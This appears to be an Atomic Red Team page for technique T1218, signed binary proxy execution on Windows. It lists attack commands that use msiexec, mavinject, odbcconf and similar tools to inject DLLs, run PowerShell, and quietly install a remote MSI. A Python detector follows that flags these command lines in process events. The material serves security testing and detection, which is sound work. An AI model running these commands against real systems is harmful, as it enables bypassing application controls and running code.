T1218.md
T1218 - Signed Binary Proxy Execution

Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.

Msiexec.exe

Msiexec.exe is the command-line Windows utility for the Windows Installer. Adversaries may use msiexec.exe to launch malicious MSI files for code execution. An adversary may use it to launch local or network accessible MSI files.(Citation: LOLBAS Msiexec)(Citation: Rancor Unit42 June 2018)(Citation: TrendMicro Msiexec Feb 2018) Msiexec.exe may also be used to execute DLLs.(Citation: LOLBAS Msiexec)

  • msiexec.exe /q /i "C:\path\to\file.msi"
  • msiexec.exe /q /i http[:]//site[.]com/file.msi
  • msiexec.exe /y "C:\path\to\file.dll"

Mavinject.exe

Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to inject a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32)

  • "C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL>
  • C:\Windows\system32\mavinject.exe <PID> /INJECTRUNNING <PATH DLL>

SyncAppvPublishingServer.exe

SyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)

Odbcconf.exe

Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The utility can be misused to execute functionality equivalent to Regsvr32 with the REGSVR option to execute a DLL.(Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)

  • odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}

Several other binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)

Atomic Tests


Atomic Test #1 - mavinject - Inject DLL into running process

Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.

Supported Platforms: Windows

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to inject | Path | PathToAtomicsFolder\T1218\src\x64\T1218.dll |
| process_id | PID of process receiving injection | string | 1000 |

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}


Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code

Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.

Supported Platforms: Windows

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_code | PowerShell code to execute | string | Start-Process calc.exe |

Attack Commands: Run with command_prompt!

SyncAppvPublishingServer.exe "n; #{powershell_code}"


Atomic Test #3 - Register-CimProvider - Execute evil dll

Executes an arbitrary DLL. Requires at least Windows 8/2012. Note that the DLL can also be served over SMB.

Supported Platforms: Windows

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll |

Attack Commands: Run with command_prompt!

C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}


Atomic Test #4 - Msiexec.exe - Execute Local MSI file

Execute arbitrary MSI file. Commonly seen in application installation.

Supported Platforms: Windows

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218.msi |

Attack Commands: Run with command_prompt!

msiexec.exe /q /i "#{msi_payload}"


Atomic Test #5 - Msiexec.exe - Execute Remote MSI file

Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution.

Supported Platforms: Windows

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| msi_payload | MSI file to execute | string | http://site.com/file.msi |

Attack Commands: Run with command_prompt!

msiexec.exe /q /i "#{msi_payload}"


Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL

Execute arbitrary DLL file stored locally. Commonly seen in application installation.

Supported Platforms: Windows

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll |

Attack Commands: Run with command_prompt!

msiexec.exe /y "#{dll_payload}"


Atomic Test #7 - Odbcconf.exe - Execute Arbitrary DLL

Execute arbitrary DLL file stored locally.

Supported Platforms: Windows

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll |

Attack Commands: Run with command_prompt!

odbcconf.exe /S /A {REGSVR "#{dll_payload}"}


Atomic Test #8 - InfDefaultInstall.exe .inf Execution

Tests execution of a .inf file using InfDefaultInstall.exe.

Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml

Supported Platforms: Windows

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf |

Attack Commands: Run with command_prompt!

InfDefaultInstall.exe #{inf_to_execute}
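The binaries described in the technique section and exercised by Atomic Tests #1 to #8 all share one detection surface: the process-creation event and its command line. As an added example (not part of the Atomic Red Team page or project code), the Python below triages normalised process-creation records for exactly the command-line patterns shown on this page: a remote MSI or a /y DLL for msiexec, /INJECTRUNNING for mavinject, a ';' in the SyncAppvPublishingServer argument, REGSVR for odbcconf, and a -Path or .inf argument outside system directories for Register-CimProvider and InfDefaultInstall. The field names (image, command_line, original_file_name), the system-directory allowlist and the sample records are assumptions constructed for this example; the allowlist in particular needs tuning per environment.

```python
"""Triage Windows process-creation events for the T1218 proxy-execution
patterns listed on this page.

Each event is a dict with the fields a normalised Sysmon Event ID 1 or
Security 4688 record provides: "image" (path of the new process),
"command_line", and optionally "original_file_name" (PE version-info name,
which survives a renamed copy). Field names and sample records are
constructed for this example.
"""
import ntpath
import re

# URL (msiexec fetches the MSI itself) or UNC path (payload served over SMB).
_REMOTE = re.compile(r"\b(https?|ftp)://|\\\\[^\\\s]+\\")
# Where a legitimately installed provider, driver or INF normally lives.
# Assumed allowlist; tune before deploying.
_SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def _args(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths intact."""
    return [a.strip('"').lower() for a in re.findall(r'"[^"]*"|\S+', cmdline)]


def _msiexec(cmd, args):
    found = []
    if any(a in ("/i", "-i", "/package") for a in args) and _REMOTE.search(cmd):
        found.append("msiexec: install from remote MSI")
    if any(a in ("/y", "/z") for a in args):  # /y registers, /z unregisters: both load the DLL
        found.append("msiexec: DLL loaded via /y or /z")
    return found


def _mavinject(cmd, args):
    return ["mavinject: /INJECTRUNNING DLL injection"] if "/injectrunning" in cmd else []


def _syncappv(cmd, args):
    # The argument is spliced into a PowerShell script; a ';' terminates the
    # intended statement and lets the rest of the argument run as PowerShell.
    return ["SyncAppvPublishingServer: PowerShell in argument"] if ";" in cmd else []


def _odbcconf(cmd, args):
    return ["odbcconf: REGSVR loads DLL"] if "regsvr" in cmd else []


def _register_cimprovider(cmd, args):
    for i, a in enumerate(args):
        if a == "-path" and i + 1 < len(args) and not args[i + 1].startswith(_SYSTEM_DIRS):
            return ["Register-CimProvider: -Path DLL outside system directories"]
    return []


def _infdefaultinstall(cmd, args):
    # Relative paths do not start with a system directory and are flagged too.
    if any(a.endswith(".inf") and not a.startswith(_SYSTEM_DIRS) for a in args[1:]):
        return ["InfDefaultInstall: .inf outside system directories"]
    return []


RULES = {
    "msiexec.exe": _msiexec,
    "mavinject.exe": _mavinject,
    "mavinject32.exe": _mavinject,
    "syncappvpublishingserver.exe": _syncappv,
    "odbcconf.exe": _odbcconf,
    "register-cimprovider.exe": _register_cimprovider,
    "infdefaultinstall.exe": _infdefaultinstall,
}


def triage(event):
    """Return the list of proxy-execution findings for one event ([] if clean)."""
    names = {ntpath.basename(event["image"]).lower()}
    if event.get("original_file_name"):          # catches a renamed copy of the binary
        names.add(event["original_file_name"].lower())
    cmd = event["command_line"]
    findings = []
    for name in names:
        for f in RULES.get(name, lambda c, a: [])(cmd.lower(), _args(cmd)):
            if f not in findings:
                findings.append(f)
    return findings


def scan(events):
    """Return [(command_line, findings)] for every event that matched a rule."""
    return [(ev["command_line"], triage(ev)) for ev in events if triage(ev)]


# Constructed sample records mirroring the Atomic Tests above (plus two benign ones).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe", "command_line": r"msiexec.exe /q /i http://site.com/file.msi"},
    {"image": r"C:\Windows\System32\msiexec.exe", "command_line": r'msiexec.exe /q /i "C:\Users\alice\AppData\Local\Temp\T1218.msi"'},
    {"image": r"C:\Windows\System32\msiexec.exe", "command_line": r'msiexec.exe /y "C:\Users\Public\T1218-2.dll"'},
    {"image": r"C:\Windows\System32\mavinject.exe", "command_line": r"mavinject.exe 1000 /INJECTRUNNING C:\Users\Public\T1218.dll"},
    {"image": r"C:\Windows\System32\SyncAppvPublishingServer.exe", "command_line": r'SyncAppvPublishingServer.exe "n; Start-Process calc.exe"'},
    {"image": r"C:\Windows\System32\odbcconf.exe", "command_line": r'odbcconf.exe /S /A {REGSVR "C:\Users\Public\T1218-2.dll"}'},
    {"image": r"C:\Windows\SysWow64\Register-CimProvider.exe", "command_line": r"C:\Windows\SysWow64\Register-CimProvider.exe -Path C:\Users\Public\T1218-2.dll"},
    {"image": r"C:\Windows\System32\InfDefaultInstall.exe", "command_line": r"InfDefaultInstall.exe C:\Users\Public\Infdefaultinstall.inf"},
    {"image": r"C:\Users\Public\upd.exe", "original_file_name": "mavinject.exe", "command_line": r"upd.exe 1000 /INJECTRUNNING C:\Users\Public\T1218.dll"},
    {"image": r"C:\Windows\System32\notepad.exe", "command_line": r"notepad.exe C:\Users\alice\notes.txt"},
]

if __name__ == "__main__":
    for cmdline, findings in scan(SAMPLE_EVENTS):
        print(f"{'; '.join(findings):60} <- {cmdline}")
```

The local msiexec install (Test #4) is deliberately not flagged: a quiet local MSI install is routine on managed hosts and only becomes interesting in combination with the MSI's origin, signer or parent process, which this command-line-only triage does not see. The OriginalFileName lookup is what keeps the mavinject rule firing when the binary is copied under another name.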